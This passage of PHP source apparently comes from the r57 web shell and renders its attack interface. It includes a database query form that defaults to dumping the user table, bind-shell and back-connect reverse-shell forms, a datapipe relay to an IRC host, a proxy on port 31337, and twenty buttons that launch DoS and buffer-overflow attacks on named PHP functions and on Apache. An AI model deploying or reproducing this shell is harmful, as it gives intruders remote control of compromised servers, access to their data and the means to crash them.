  7022. echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
  7023.  
  7024. echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
  7025.  
  7026. echo "</td>".$fe."</tr></div></table>";
  7027.  
  7028. }
  7029.  
  7030. if(!$safe_mode &&$unix){
  7031.  
  7032. echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
  7033.  
  7034. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
  7035.  
  7036. echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
  7037.  
  7038. echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
  7039.  
  7040. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
  7041.  
  7042. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
  7043.  
  7044. echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
  7045.  
  7046. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
  7047.  
  7048. echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ?(getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
  7049.  
  7050. echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
  7051.  
  7052. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
  7053.  
  7054. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
  7055.  
  7056. echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
  7057.  
  7058. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
  7059.  
  7060. echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
  7061.  
  7062. echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
  7063.  
  7064. echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
  7065.  
  7066. echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
  7067.  
  7068. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
  7069.  
  7070. echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
  7071.  
  7072. echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
  7073.  
  7074. echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
  7075.  
  7076. echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
  7077.  
  7078. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
  7079.  
  7080. echo $te."</td>".$fe."</tr></div></table>";
  7081.  
  7082. }
  7083.  
  7084. echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=50%>".$ts;
  7085.  
  7086. echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
  7087.  
  7088. echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
  7089.  
  7090. echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit exhaustion in [ pack() ] function').$fe);
  7091.  
  7092. echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF in [ unserialize() ] function').$fe);
  7093.  
  7094. echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'Limit integer calculate (65535) in ZendEngine').$fe);
  7095.  
  7096. echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [ dl() ] vulnerability').$fe);
  7097.  
  7098. echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)').$fe);
  7099.  
  7100. echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)').$fe);
  7101.  
  7102. echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
  7103.  
  7104. echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)').$fe);
  7105.  
  7106. echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)').$fe);
  7107.  
  7108. echo $te."</td><td valign=top width=50%>".$ts;
  7109.  
  7110. echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
  7111.  
  7112. echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)').$fe);
  7113.  
  7114. echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)').$fe);
  7115.  
  7116. echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)').$fe);
  7117.  
  7118. echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF in [ str_ireplace() ] function (PHP <5.2.x)').$fe);
  7119.  
  7120. echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)').$fe);
  7121.  
  7122. echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)').$fe);
  7123.  
  7124. echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)').$fe);
  7125.  
  7126. echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)').$fe);
  7127.  
  7128. echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)').$fe);
  7129.  
  7130. echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)').$fe);
  7131.  
  7132. echo $te."</td></tr></div></table>";
  7133.  
  7134. ?>
Add Comment
Please, Sign In to add comment